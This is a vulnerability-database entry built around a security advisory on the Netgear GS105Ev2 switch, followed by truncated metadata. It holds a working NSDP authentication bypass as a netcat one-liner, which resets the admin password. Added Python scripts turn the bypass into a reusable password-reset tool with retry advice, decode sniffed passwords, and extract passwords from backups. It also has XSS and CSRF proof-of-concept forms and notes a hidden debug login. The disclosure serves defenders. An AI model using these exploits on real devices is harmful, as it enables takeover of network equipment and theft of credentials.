VAR-201409-0175
Vulnerability from variot - Updated: 2025-04-12 23:24

The NETGEAR ProSafe Plus Configuration Utility creates configuration backup files containing cleartext passwords, which might allow remote attackers to obtain sensitive information by reading a file. The ProSafe Plus Configuration Utility provided by Netgear has a function to back up the switch settings (CWE-200: Information Exposure, http://cwe.mitre.org/data/definitions/200.html). A third party who can access the backup file may obtain the device management password. Attackers can exploit this vulnerability to obtain sensitive information.

# Multiple Vulnerabilities - Netgear GS105Ev2
## Product

Vendor: Netgear

Model: GS105Ev2

Firmware version: 1.3.0.3, 1.4.0.2

Reference: http://downloadcenter.netgear.com/de/product/GS105Ev2#searchResults

The Netgear GS105Ev2 is a 5-port Gigabit switch targeting SMBs.

## Status/Metrics/Identifier

Status: unfixed

CVSS v2 Vector: (AV:A/AC:L/Au:N/C:C/I:C/A:C)

CVSS Score: 8.3

CVE-ID: n/a

The highest risk is represented by the authentication bypass; the score reflects that finding.

## Author/Credits

Benedikt Westermann (TÜV Rheinland i-sec GmbH)
## Authentication bypass in NSDP

The implementation of NSDP (the Netgear Switch Discovery Protocol, spoken by the ProSafe Plus Configuration Utility) on the GS105Ev2 (and possibly other switches) is flawed. An attacker with access to the broadcast domain of the switch can bypass the authentication process. This gives the attacker full control of the switch: arbitrary configuration settings can be modified, or a different firmware image can be flashed onto the switch.
### Detailed Description of the Vulnerability

NSDP is a simple stateless protocol. A packet consists of a header, a body made up of an array of type-length-value triplets, and a trailer.

The general structure is depicted below.

    /---------------------+----------------------\
    | 1 byte: version     | 1 byte: packet-type  |
    +---------------------+----------------------+
    | 2 bytes: result     | 4 bytes: reserved    |
    +---------------------+----------------------+
    | 6 bytes: src mac    | 6 bytes: dest mac    |
    +---------------------+----------------------+
    | 2 bytes: reserved   | 2 bytes: sequence no |
    +---------------------+----------------------+
    | 4 bytes: signature  | 2 bytes: reserved    |
    +---------------------+----------------------+
    | N bytes: TLV        | 2 bytes: 0xFFFF      |
    +---------------------+----------------------/
    | 2 bytes: 0x0000     |
    \---------------------/

The TLV part is a sequence of type-length-value (TLV) triples. An entry has the following structure:

    /----------------+-------------------+---------------\
    | 2 bytes: type  | 2 bytes: length l | l bytes: data |
    \----------------+-------------------+---------------/

Regarding this vulnerability, the following two types are of special importance:

    Type 0x0009 - write password
    Type 0x9400 - unknown, but seems to indicate that no authentication is performed.
By sending the following UDP datagram to port 63322 of the GS105Ev2 switch's IP address, the password is changed to "test":

    |version|type|result|reserved   |src-mac          |dst-mac
     01:    03:  00:00: 00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:

    |reserved|seq  |Sig. (NSDP) |TLV type 0x9400|TLV type 0x0009        |Trailer
     00:00:   00:78:4e:53:44:50:94:00:00:00:   00:09:00:04:3a:11:14:06:ff:ff:00:00
The relevant part is 94:00:00:00:00:09:00:04:3a:11:14:06.

The first four bytes, 94:00:00:00, form a TLV of type 0x9400 with length 0 (no value). It is followed by the TLV 00:09:00:04:3a:11:14:06: 0x0009 is the type "write password", 0x0004 is the length of the password, and 3a:11:14:06 is the "encrypted" password that is about to be set. The "encryption" is a plain XOR of the password with the string "NtgrSmartSwitchRock"; for passwords longer than that key, the key is reused cyclically. As a check: "test" XOR "Ntgr" gives 3a:11:14:06.

Note that the diagram above shows two reserved bytes after the signature, while in this datagram 94:00:00:00 directly follows "NSDP" (and the reply below carries 00:00:00:00 at that position). Whether those four bytes are read as the header's reserved field or as a zero-length TLV, the bytes on the wire are the same, and it is the 0x94 at that position that switches off the authentication check.
If the password was set successfully, the switch replies with the following message:

    01:04:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:00:00:00:00

A reply starting with the prefix 01:04:00:00 means the password was changed successfully. The attacker can then log in to the following configuration interfaces:

- Web interface http://<ip-of-switch>/login.cgi
- Web interface http://<ip-of-switch>/loginhidden.cgi with user Admin1NtgrDebugUser (which exposes, e.g., http://<ip-of-switch>/bootcode_update.cgi and http://<ip-of-switch>/produce_burn.cgi)
- Netgear Configuration utility

With this, the configuration can be changed, e.g., a monitoring port enabled or a new firmware flashed.
The following bash script can be used to change the password to "test":

    echo "Please enter IP of switch:"; read ip; echo ""
    echo "Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :"; read mac
    echo "01:03:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00" \
      | sed "s/c0:ff:d4:ba:61:fc/$mac/g;s/://g" | xxd -r -p | nc -q 0 -b -u $ip 63322

The sed call patches the entered MAC into the destination-MAC field of the template (the source MAC, 3c:97:0e:ee:98:eb, is left as is) and strips the colons; xxd -r -p turns the hex string into raw bytes, and nc -u sends them as a single UDP datagram.

For a switch with the IP 192.168.0.239 and the MAC c0:ff:d4:ba:61:fc, the input and output look like this:

    Please enter IP of switch:
    192.168.0.239

    Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :
    c0:ff:d4:ba:61:fc

If the password is not changed, reboot the switch: this little script does not track the sequence number (the fixed 00:78 in the template).

It should be noted that the authentication bypass is not limited to the "set password" function. Other write functions are also affected by this vulnerability.
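The same datagram built from the field layout above, as an added Python example (not code from the advisory): it reproduces the advisory's bytes exactly for the password "test", but takes both MACs, the password and the sequence number as parameters, so the sequence-number caveat of the bash one-liner can be worked around without rebooting the switch. Port 63322, the "NSDP" signature, the TLV types 0x9400/0x0009, the XOR key and the 01:04:00:00 reply prefix are taken from the advisory; the UDP send helper and its timeout are my additions and are not exercised offline.

```python
"""Craft the NSDP 'write password' datagram described in the advisory.

Added example. Constants come from the advisory text; the send helper
(UDP socket, 2 s timeout) is an assumption about how one would use it.
"""
import socket
import struct

NSDP_PORT = 63322                       # from the advisory
XOR_KEY = b"NtgrSmartSwitchRock"        # from the advisory
TLV_WRITE_PASSWORD = 0x0009             # "write password"
TLV_NO_AUTH = 0x9400                    # meaning unknown; its presence skips authentication
OP_WRITE_REQUEST = 0x03
OP_WRITE_REPLY = 0x04


def mac_bytes(mac: str) -> bytes:
    """'c0:ff:d4:ba:61:fc' -> six raw bytes."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError("MAC must have six colon-separated octets")
    return bytes(int(p, 16) for p in parts)


def xor_password(data: bytes) -> bytes:
    """Repeating-key XOR with the fixed key; the same call encodes and decodes."""
    return bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(data))


def tlv(tlv_type: int, value: bytes = b"") -> bytes:
    """One type-length-value entry, big-endian type and length."""
    return struct.pack(">HH", tlv_type, len(value)) + value


def build_set_password(src_mac: str, dst_mac: str, new_password: str, seq: int = 0x78) -> bytes:
    """Header (per the advisory's diagram), the two TLVs, and the 0xFFFF 0x0000 trailer."""
    header = struct.pack(">BBHI", 1, OP_WRITE_REQUEST, 0, 0)   # version, type, result, reserved
    header += mac_bytes(src_mac) + mac_bytes(dst_mac)
    header += struct.pack(">HH", 0, seq)                         # reserved, sequence number
    header += b"NSDP"                                            # signature
    body = tlv(TLV_NO_AUTH) + tlv(TLV_WRITE_PASSWORD, xor_password(new_password.encode()))
    trailer = b"\xff\xff\x00\x00"
    return header + body + trailer


def password_was_set(reply: bytes) -> bool:
    """The advisory: a reply beginning 01 04 00 00 means the password was changed."""
    return reply[:4] == bytes([1, OP_WRITE_REPLY, 0, 0])


def send_set_password(ip: str, src_mac: str, dst_mac: str, new_password: str,
                      seq: int = 0x78, timeout: float = 2.0) -> bool:
    """Send the datagram over UDP and report whether the switch acknowledged it (assumed usage)."""
    pkt = build_set_password(src_mac, dst_mac, new_password, seq)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(pkt, (ip, NSDP_PORT))
        try:
            reply, _ = sock.recvfrom(1500)
        except socket.timeout:
            return False
    return password_was_set(reply)


# The datagram printed in the advisory, for comparison.
ADVISORY_PACKET = bytes.fromhex(
    "0103000000000000" "3c970eee98eb" "c0ffd4ba61fc"
    "00000078" "4e534450" "94000000" "000900043a111406" "ffff0000")

if __name__ == "__main__":
    pkt = build_set_password("3c:97:0e:ee:98:eb", "c0:ff:d4:ba:61:fc", "test")
    print(pkt.hex(":"))
    print("matches advisory:", pkt == ADVISORY_PACKET)
```

If the switch stays silent for one sequence number, retry with a different `seq` rather than power-cycling the device; the rest of the packet is unchanged.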
Note that the "encryption" scheme for the password is broken. The key string (NtgrSmartSwitchRock) can be recovered by XORing a known password with its encoded form, so an attacker within the broadcast domain can eavesdrop on NSDP traffic and decode any password that is set. This fact was already noted in [Security by Obscurity bei Netgear Switches].

[Security by Obscurity bei Netgear Switches]: http://www.linux-magazin.de/Blogs/Insecurity-Bulletin/Gastbeitrag-Security-by-Obscurity-bei-Netgear-Switches
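The passive side of that remark, as an added Python example (not part of the advisory): split a captured NSDP datagram into header and TLVs following the diagram above, decode a type-0x0009 value with the fixed key, and show the known-plaintext step that recovers the key from one password/ciphertext pair. The "captured" datagram is the advisory's own set-password packet and its reply, so no traffic needs to be sniffed to run it; treating the 28 bytes up to and including "NSDP" as the header is my reading of the diagram.

```python
"""Decode a password from a captured NSDP 'write password' datagram.

Added example. CAPTURED and REPLY are the two datagrams printed in the
advisory; the header offsets follow the advisory's packet diagram.
"""
import struct

HEADER_LEN = 28                  # through the 4-byte "NSDP" signature
TLV_WRITE_PASSWORD = 0x0009
KNOWN_KEY = b"NtgrSmartSwitchRock"


def parse_tlvs(payload: bytes):
    """Walk the TLV area until the 0xFFFF end marker or the end of the data."""
    tlvs = []
    off = 0
    while off + 4 <= len(payload):
        tlv_type, length = struct.unpack(">HH", payload[off:off + 4])
        if tlv_type == 0xFFFF:
            break
        off += 4
        if off + length > len(payload):
            raise ValueError("truncated TLV")
        tlvs.append((tlv_type, payload[off:off + length]))
        off += length
    return tlvs


def split_packet(pkt: bytes):
    """Header fields named in the advisory's diagram, plus the parsed TLV list."""
    if len(pkt) < HEADER_LEN or pkt[24:28] != b"NSDP":
        raise ValueError("not an NSDP packet")
    header = {
        "version": pkt[0],
        "op": pkt[1],
        "src_mac": pkt[8:14].hex(":"),
        "dst_mac": pkt[14:20].hex(":"),
        "seq": struct.unpack(">H", pkt[22:24])[0],
    }
    return header, parse_tlvs(pkt[HEADER_LEN:])


def xor_with_key(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def sniffed_password(pkt: bytes, key: bytes = KNOWN_KEY):
    """Cleartext of the first type-0x0009 TLV in the packet, or None if there is none."""
    _, tlvs = split_packet(pkt)
    for tlv_type, value in tlvs:
        if tlv_type == TLV_WRITE_PASSWORD:
            return xor_with_key(value, key).decode("ascii", "replace")
    return None


def recover_key_prefix(cleartext: bytes, encoded: bytes) -> bytes:
    """Known-plaintext step: XOR of a known password and its encoding yields key bytes."""
    return bytes(a ^ b for a, b in zip(cleartext, encoded))


CAPTURED = bytes.fromhex(
    "0103000000000000" "3c970eee98eb" "c0ffd4ba61fc"
    "00000078" "4e534450" "94000000" "000900043a111406" "ffff0000")
REPLY = bytes.fromhex(
    "0104000000000000" "3c970eee98eb" "c0ffd4ba61fc"
    "00000078" "4e534450" "00000000")

if __name__ == "__main__":
    header, tlvs = split_packet(CAPTURED)
    print(header, [(hex(t), v.hex()) for t, v in tlvs])
    print("password set to:", sniffed_password(CAPTURED))
    print("key bytes recovered:", recover_key_prefix(b"test", bytes.fromhex("3a111406")))
```

A four-character password only yields the first four key bytes ("Ntgr"); one known password of nineteen or more characters, or several shorter ones set over time, recovers the whole key.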
## Multiple Vulnerabilities in Web-Interface

Though we did not perform a full analysis of the web interface, we noticed that it is prone to several vulnerabilities, namely XSS, CSRF, and insufficient protection of the password.

### Detailed Description of the Vulnerabilities

#### XSS

The web interface does not properly encode its output, which allows reflected Cross-Site Scripting. The issue can be reproduced with the following request:
    POST /switch_info.cgi HTTP/1.1
    Host: 192.168.0.239
    Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 110

    switch_name='onclick=alert(1)&dhcpMode=0&ip_address='><Script>alert(&subnet_mask=1)</script>'&gateway_address=
Alternatively, the following HTML document can be opened to trigger the XSS (the script payload is split across the ip_address and subnet_mask fields):

    <html>
      <body>
        <form action="http://192.168.0.239/switch_info.cgi" method="POST">
          <input type="hidden" name="switch_name" value="Blubb" />
          <input type="hidden" name="dhcpMode" value="0" />
          <input type="hidden" name="ip_address" value="'><Script>alert(" />
          <input type="hidden" name="subnet_mask" value="1)</script>'" />
          <input type="hidden" name="gateway_address" value="" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

The following fields are affected: IP Address, Netmask, Gateway Address.
#### CSRF

In addition, the web application has no protection against Cross-Site Request Forgery. The following PoC, submitted from a page the logged-in administrator visits, reproduces the problem by rewriting the switch name and IP configuration:

    <html>
      <body>
        <form action="http://192.168.0.239/switch_info.cgi" method="POST">
          <input type="hidden" name="switch_name" value="CSRF" />
          <input type="hidden" name="dhcpMode" value="0" />
          <input type="hidden" name="ip_address" value="192.168.0.239" />
          <input type="hidden" name="subnet_mask" value="255.255.255.0" />
          <input type="hidden" name="gateway_address" value="192.168.0.1" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
#### Password Disclosure

Moreover, a configuration backup created through the web interface stores the password in cleartext (fixed with 1.4.0.2). Here the password secretPass is visible in the backup file:

    hexdump -C GS105Ev2.cfg
    00000000  23 79 23 79 00 c0 a8 00  ef ff ff ff 00 c0 a8 00  |#y#y............|
    00000010  01 00 00 00 00 00 00 61  64 6d 69 6e 00 00 00 00  |.......admin....|
    00000020  73 65 63 72 65 74 50 61  73 73 00 00 00 00 00 00  |secretPass......|
    00000030  00 00 00 00 00 00 0f ff  f8 00 0f ff f8 00 0f ff  |................|
    00000040  f8 00 0f ff f8 00 0f ff  f8 00 0f ff f8 00 0f ff  |................|

CVE-2014-4864 describes the same problem for backups created with the ProSafe Plus Configuration Utility, which talks to the switch over NSDP.
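A small parser for the backup layout shown in the hexdump, as an added Python example (not from the advisory or from Netgear), plus the generic check a practitioner actually wants: does this backup contain my admin password in the clear? The sample blob is reconstructed from the advisory's hexdump (first 0x50 bytes, then zero padding). Only the cleartext password at offset 0x20 is stated by the advisory; reading the bytes at 0x05, 0x09 and 0x0d as IP, netmask and gateway, and the "admin" string at 0x17 as a separate field, is my assumption from the byte values (they match 192.168.0.239/24 and 192.168.0.1 used elsewhere in the advisory).

```python
"""Inspect a GS105Ev2 configuration backup for a cleartext password.

Added example. SAMPLE_BACKUP is reconstructed from the advisory's hexdump;
field offsets other than the password are assumptions read off the bytes.
"""
import ipaddress

SAMPLE_BACKUP = bytes.fromhex(
    "23792379 00c0a800 efffffff 00c0a800"
    "01000000 00000061 646d696e 00000000"
    "73656372 65745061 73730000 00000000"
    "00000000 00000fff f8000fff f8000fff"
    "f8000fff f8000fff f8000fff f8000fff"
) + bytes(0x30)                      # padding so the sample is not cut mid-field

MAGIC = b"#y#y"                       # first four bytes in the hexdump
PASSWORD_OFFSET = 0x20                # "secretPass" starts here in the hexdump
PASSWORD_FIELD_LEN = 0x16             # assumption: up to the 0f ff f8 00 pattern at 0x36


def cstring(data: bytes, offset: int, max_len: int) -> str:
    """NUL-terminated ASCII string at offset, at most max_len bytes long."""
    chunk = data[offset:offset + max_len]
    end = chunk.find(b"\x00")
    return (chunk if end < 0 else chunk[:end]).decode("ascii", "replace")


def password_from_backup(data: bytes) -> str:
    """The cleartext admin password stored at the offset seen in the advisory."""
    return cstring(data, PASSWORD_OFFSET, PASSWORD_FIELD_LEN)


def parse_backup(data: bytes) -> dict:
    """Fields in the sample layout; everything except 'password' is an assumed interpretation."""
    if len(data) < 0x40 or data[:4] != MAGIC:
        raise ValueError("does not look like a GS105Ev2 backup (missing #y#y magic)")
    return {
        "ip": str(ipaddress.IPv4Address(data[0x05:0x09])),
        "netmask": str(ipaddress.IPv4Address(data[0x09:0x0d])),
        "gateway": str(ipaddress.IPv4Address(data[0x0d:0x11])),
        "string_at_0x17": cstring(data, 0x17, 9),     # reads "admin"; meaning not given by the advisory
        "password": password_from_backup(data),
    }


def find_cleartext(data: bytes, secret: bytes) -> int:
    """Layout-independent check: offset of the secret if stored in the clear, else -1."""
    return data.find(secret) if secret else -1


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BACKUP
    print(parse_backup(blob))
    print("password in the clear at offset:", find_cleartext(blob, b"secretPass"))
```

`find_cleartext` is the part worth keeping around: run it with the real admin password against any backup (from the web interface or the configuration utility) before storing the file anywhere a third party can read it.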
#### Predictable Cookies

Another issue is the session ID, which appears to be predictable and derived from the uptime of the switch. When the first login happens within a minute after power-on, the switch issues the session ID shown below. Before each of the login requests below, the switch was disconnected from the power supply and reconnected, and the same session ID was returned every time. After some uptime the ID changes again.
##### Request 1

    POST /login.cgi HTTP/1.1
    Host: 192.168.0.239
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 13

    password=test

##### Response 1

    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
    Content-Length: 3454

##### Request 2

    POST /login.cgi HTTP/1.1
    Host: 192.168.0.239
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 13

    password=walla

##### Response 2

    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
    Content-Length: 3454

##### Request 3

    POST /login.cgi HTTP/1.1
    Host: 192.168.0.239
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 13

    password=secretPass

##### Response 3

    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
    Content-Length: 3454
## Fixed Versions

No updates are currently available for the authentication bypass and the web-interface issues.

Password Disclosure: fixed in version 1.4.0.2

## History

10.08.2015 - Initial contact to Netgear via support chat
10.08.2015 - Set preliminary disclosure date
11.08.2015 - Netgear Support confirms findings
01.09.2015 - Netgear Support informs that currently no immediate plans exist to fix the issues
27.01.2016 - Public disclosure
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201409-0175",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prosafe",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "6.1.0.12"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netgear",
"version": null
},
{
"model": "prosafe plus configuration utility",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "fs116e prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "jfs524e prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "gs105e prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "gs108e prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "gs108pe prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "prosafe",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "6.1.0.12"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:prosafe_plus_configuration_utility",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CERT/CC",
"sources": [
{
"db": "BID",
"id": "69666"
}
],
"trust": 0.3
},
"cve": "CVE-2014-4864",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2014-4864",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 2.9,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "PARTIAL",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 2.0,
"exploitability": "FUNCTIONAL",
"exploitabilityScore": 5.5,
"id": "CVE-2014-4864",
"impactScore": 2.9,
"integrityImpact": "NONE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "UNAVAILABLE",
"reportConfidence": "CONFIRMED",
"severity": "LOW",
"targetDistribution": "MEDIUM",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:A/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "None",
"baseScore": 2.9,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2014-004071",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-05497",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "VHN-72805",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-4864",
"trust": 1.0,
"value": "LOW"
},
{
"author": "NVD",
"id": "CVE-2014-4864",
"trust": 0.8,
"value": "LOW"
},
{
"author": "IPA",
"id": "JVNDB-2014-004071",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNVD",
"id": "CNVD-2014-05497",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201409-457",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-72805",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The NETGEAR ProSafe Plus Configuration Utility creates configuration backup files containing cleartext passwords, which might allow remote attackers to obtain sensitive information by reading a file. Netgear Provided by ProSafe Plus Configuration Utility Has a function to back up the switch settings. CWE-200: Information Exposure http://cwe.mitre.org/data/definitions/200.htmlA third party who can access the backup file may obtain the device management password. Attackers can exploit vulnerabilities to obtain sensitive information. # Multiple Vulnerabilities - Netgear GS105Ev2\n\n\n## Product\n\nVendor: Netgear\n\nModel: GS105Ev2\n\nFirmware version: 1.3.0.3,1.4.0.2\n\nReference: http://downloadcenter.netgear.com/de/product/GS105Ev2#searchResults\n\nNetgear GS105Ev2 is a Gigabit switch with 5 ports targeting SMBs. \n\n\n## Status/Metrics/Identifier\n\nStatus: unfixed \n\nCVSS v2 Vector: (AV:A/AC:L/Au:N/C:C/I:C/A:C)\n\nCVSS Score: 8.3\n\nCVE-ID: n/A\n\nThe highest risk is represented by the authentication bypass. This is reflected by the score. \n\n## Author/Credits\n\nBenedikt Westermann (T\\xdcV Rheinland i-sec GmbH)\n\n\n## Authentication bypass in NSDP\n\nThe implementation of the NSDP on the GS105Ev2 (and possibly also other switches) is flawed. An attacker with access to the broadcast domain of the switch can bypass\nthe authentication process. This allows the attacker to gain full control of the switch, i.e., he can modify a particular configuration or flash another firmware to the \nthe switch. \n\n\n### Detailed Description of the Vulnerability\n\nThe NSDP is a simple stateless protocol. It consists of a header, a trailer, and a body consisting of an array of type-length-value triplets. \n\nThe general structure is depicted below. 
\n\n\t/---------------------+----------------------\\\n\t| 1 byte: version | 1 byte: packet-type | \n\t+---------------------+----------------------+\n\t| 2 bytes: result | 4 bytes: reserved |\n\t+---------------------+----------------------+\n\t| 6 bytes: src mac | 6 byte: dest mac |\n\t+---------------------+----------------------+\n\t| 2 bytes: reserved | 2 bytes: sequence no |\n \t+---------------------+----------------------+\n\t| 4 bytes: signature | 2 bytes: reserved |\n\t+---------------------+----------------------+\t\n\t| N bytes: TLV | 2 bytes: 0xFFFF | \n\t+---------------------+----------------------/\n\t| 2 bytes: 0x0000 |\n\t\\---------------------/\n\nThe TLV part is a sequence of type-length-value (TLV) triples. An entry has the following structure:\n\n\t/----------------+-------------------+---------------\\\n\t| 2 bytes: type | 2 bytes: length l| l bytes: data |\n\t\\----------------+-------------------+---------------/\n\nRegarding this vulnerability, the following two types are of special 